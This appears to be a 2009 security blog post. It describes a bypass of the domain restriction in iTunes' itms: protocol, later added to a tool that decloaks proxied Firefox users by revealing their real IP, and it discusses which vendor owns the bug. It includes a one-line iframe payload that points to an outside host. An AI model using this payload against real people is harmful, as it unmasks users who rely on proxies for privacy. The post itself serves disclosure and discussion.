Another thing Jabra and I mentioned in the presentation actually dates back several months. HD Moore was talking about how someone (name is slipping my mind at the moment) had found some exploit using itms: protocol, used by iTunes, but part of it had to do with the fact that they needed to redirect off of Apple’s website to land on their payload. The redirect was eventually closed down, but it got me thinking and looking at iTunes. After about 20 minutes of looking I found a way to bypass itms’s limitations on which domain it allows you to connect to, which is a bug, but not a particularly serious one:

<iframe src="itms:www.apple.com:80@ha.ckers.org"></iframe>

So I handed it back to HD Moore and he added it as a feature to decloak a few months back. Why? Because it turns out that in specific circumstances it’s actually pretty good at decloaking people. If you are using Firefox and a proxy, it will go outside of the proxy model of the browser and use the underlying network settings of the operating system. So the first request will come from your proxy but the itms request will come from your real external IP. Add in some DNS foo to make the DNS request unique per person and you’ve got yourself a decloaking engine. You can see it on decloak if you want to take a look at it. And like before, if there is an exploit in itms where you need to include a payload into it off of Apple’s website, this is another way to do it.

I talked with Microsoft, Apple and Firefox about this and we had a very hard time talking about who owns this bug. Let’s say for a second Apple had no bug there, and it was working as intended. Who’s bug would it be? Apple for not following the proxy model? Firefox for not forcing the proxy model on all of it’s sub components OR for having it’s own unique proxy model? Or is it Microsoft who runs the entire operating system. I don’t think we ever came to a conclusion, but I’m more and more thinking it’s Firefox’s fault. They did go down the path of creating their own proxy model a long time ago (out of necessity). Now the question is, should they fix it? I for one would hate it if it got fixed. Sure, it’s horrible from a privacy perspective, but it’s great for usability. I’m constantly stuck on weird networks with weird proxy settings in the OS, and I need to get out for some reason. I think there are a lot of other people in the same boat too. So I doubt this is getting fixed any time soon.

This brought up one last conversation that I thought was worth sharing. The private browsing initiative that several browsers are undertaking at the moment really was never meant to protect users from this sort of privacy leak. It was intended to prevent wives from seeing what presents their husbands are buying them for their birthday. *cough* But maybe future versions should do a better job of this sort of privacy leaks - better integrate with Tor or something of that nature. I dunno, but it was an interesting conversation with the browser/OS/plugin guys.

This entry was posted on Wednesday, August 19th, 2009 at 9:43 am and is filed under Webappsec. You can leave a response as well.